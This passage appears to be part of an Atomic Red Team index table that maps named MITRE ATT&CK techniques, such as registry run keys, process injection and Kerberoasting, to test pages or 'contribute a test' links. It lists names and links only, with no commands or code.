| | | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | | [Modify Registry](../../T1112/T1112.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indirect Command Execution](../../T1202/T1202.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Impair Defenses](../../T1562/T1562.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Masquerading](../../T1036/T1036.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Forced Authentication](../../T1187/T1187.md) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
|
||||
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
|
||||
| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
|
||||
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
|
||||
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) | | | | | | | |
|
||||
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Account Manipulation](../../T1098/T1098.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
|
||||
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
|
||||
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
|
||||
| | | [IIS Components](../../T1505.004/T1505.004.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution](../../T1546/T1546.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
|
||||
| | | [Authentication Package](../../T1547.002/T1547.002.md) | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
|
||||
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [BITS Jobs](../../T1197/T1197.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
|
||||
| | | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
|
||||
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
|
||||
| | | [IIS Components](../../T1505.004/T1505.004.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution](../../T1546/T1546.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
|
||||
| | | [Authentication Package](../../T1547.002/T1547.002.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
|
||||
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [BITS Jobs](../../T1197/T1197.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
|
||||
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | | | | | | | |
|
||||
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) | | | | | | | |
|
||||
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
|
||||
| | | | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
